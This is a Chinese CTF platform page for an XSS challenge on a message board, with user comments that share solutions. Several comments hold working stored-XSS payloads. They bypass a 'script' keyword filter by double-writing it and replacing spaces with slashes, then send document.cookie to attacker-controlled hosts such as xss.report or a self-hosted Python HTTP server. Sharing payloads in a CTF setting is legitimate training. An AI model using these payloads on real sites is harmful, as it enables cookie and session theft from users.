留言板1WEB 未解决

分数: 20 金币: 3
题目作者: harry
一  血: 18256197318
一血奖励: 5金币
解  决: 222
提  示: 需要xss平台接收flag
描  述:
flag{}
...
登录回复
评论
暗流安全 20天前
举报

说点什么吧[img]<scsCRiPtript>location.href="http:/xxxx:8888/?flag_cookie="+document.cookie</scsCRiPtript>[/img] 然后可以用公网运行python3 -m http.server 8888 记得点一下那个图片才会有发送

回复 0
小白RM 1月前
举报

三战,最后直接在当前页面执行了 location.href 跳转,并且用双写绕过关键词过滤 使用自建平台<scscriptript>location.href="http://www.iytzx.com/****/?cookie="+document.cookie</scscriptript>成功接收到flag

回复 3
kr2yh 2月前
举报

<scriscriptpt/src=https://xss.report/c/kr2yh></scriscriptpt> 双写加/代替空格 就可以

回复 1
十里故清云 3月前
举报

在线蹲大手子,只能靠自建vps公网ip收吗?? 现在还有xss平台能收吗(我已急哭)

回复 0
qq1002517 4月前
举报

flag{**********}

回复 0
网恋秀牛子被录屏导致自卑 5月前
举报

我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag。 这题是script双写绕过,空格用斜杠代替

回复 0
十里故清云 3月前
举报

用双写绕过和空格了,还是收不到啊...

回复 0
dlgz 10月前
举报

公网上的xss平台没找到http的,自己搭了一个测试的成功了。

回复 0
Kr1smi1e 11月前
举报

题目确实没问题,可以参考:https://blog.csdn.net/weixin_74357882/article/details/149303799?sharetype=blogdetail&sharerId=149303799&sharerefer=PC&sharesource=weixin_74357882&spm=1011.2480.3001.8118

回复 1
iNMB 11月前
举报

垃圾题目,输入的js根本没有回显。使用浏览器看cookies发现flag,结果上传flag说我flag错误。

回复 1
llc123 1年前
举报

根本收不到,还以为你加了什么限制,花5金币看你wp等于白看

回复 2

WriteUp

image
小蔡

5 金币

立即查看

评分(3)

解题动态

店晓贰 攻破了该题 1天前
掘金 攻破了该题 13天前
Junze 攻破了该题 13天前
CTF-大王 攻破了该题 18天前
ws123 攻破了该题 18天前
ccxxxc 攻破了该题 20天前
暗流安全 攻破了该题 20天前
ailiyishen 攻破了该题 1月前
Galaxies2580 攻破了该题 1月前
Owen_10 攻破了该题 1月前
edadsadw 攻破了该题 1月前
小白RM 攻破了该题 1月前
wdfctf 攻破了该题 1月前
2523822945 攻破了该题 2月前
Anna-july 攻破了该题 2月前
wujita01 攻破了该题 2月前
XavierSilas 攻破了该题 2月前
kr2yh 攻破了该题 2月前
seyana 攻破了该题 2月前
scofield 攻破了该题 2月前
问题反馈